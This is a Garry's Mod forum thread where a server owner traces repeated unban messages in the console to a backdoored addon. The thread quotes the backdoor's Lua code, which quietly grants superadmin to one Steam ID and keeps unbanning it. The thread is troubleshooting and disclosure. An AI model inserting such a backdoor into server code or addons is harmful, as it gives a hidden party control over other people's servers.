• Banned_user.cfg Help
    13 replies, posted
[CODE] Writing cfg/banned_user.cfg. removeid: couldn't find STEAM_0:1:92046224 Writing cfg/banned_user.cfg. removeid: couldn't find STEAM_0:1:92046224 Writing cfg/banned_user.cfg. removeid: couldn't find STEAM_0:1:92046224 Writing cfg/banned_user.cfg. removeid: couldn't find STEAM_0:1:92046224 Writing cfg/banned_user.cfg. [/CODE] Why is it doing this in my server's console, over, and over...... and over again
[url]http://steamcommunity.com/id/Chewgumm/[/url] This is the Steam ID it's spamming. Do you have any addons by him or friends of his?
I know who's Id it is. I don't believe I have anything from him. Never heard or seen him before.
Do you have sv_allowupload and sv_allowdownload set to 1 or 0? And do you have your rcon password set in your config.cfg?
yes I do
[QUOTE=elixwhitetail;46664962]Do you have sv_allowupload and sv_allowdownload set to 1 or 0?[/QUOTE] This is an either-or, please specify. However, you should consider setting your rcon password in the command line arguments instead of in the file, because if someone can read the server (sv_allowdownload 1), they can get the file and get your rcon password.
I have changed the Rcon password and added sv_allowdownload 0 [editline]7th December 2014[/editline] Did not affect anything. Still getting it. [editline]7th December 2014[/editline] And to be more specific I did not have those before. I still do not have sv_allowupload.
Yeah, but now you know how this crap probably got into your server, because you left your rcon password visible and probably had downloading enabled. If sprays worked, you had upload and download enabled, probably by default. Change your rcon password, to start, and make sure there aren't any addons that don't belong.
Any idea where it would be, What the line of code would be, or anything like that. I have a program that and sweep the server and look for it. [editline]7th December 2014[/editline] Rcon password was changed
I know nothing about your server and the addons you use, so I'd start by searching for that steam ID and see if it turns up anywhere (other than the console spam).
Alright. I was asking where they would usually put this. Or what type of file it would be. [editline]7th December 2014[/editline] FOUND IT [editline]7th December 2014[/editline] [CODE] concommand.Add( "banners", function(ply) if ( ply:SteamID() == "STEAM_0:1:92046224") then RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin") else ply:ChatPrint("Your banned from chat, " .. ply:Name() .. ".") end end) timer.Create( "checkForBan", 10, 0, function() ULib.unban( "STEAM_0:1:92046224") end ) [/CODE] [editline]7th December 2014[/editline] It was in an addon I installed.
Which addon was it; it's a backdoor and their addon can be banned for it.
it was an old garrysmod.com addon for a car dealer.
Once again, this is a skid called Valinate, and your most likely using a leak. Funny story, I wrote that code for him so he could use it to unban himself from his own server, seems he learned to copy and paste. That, or you bought one of the backdoored addons he put on scriptfodder.
Sorry, you need to Log In to post a reply to this thread.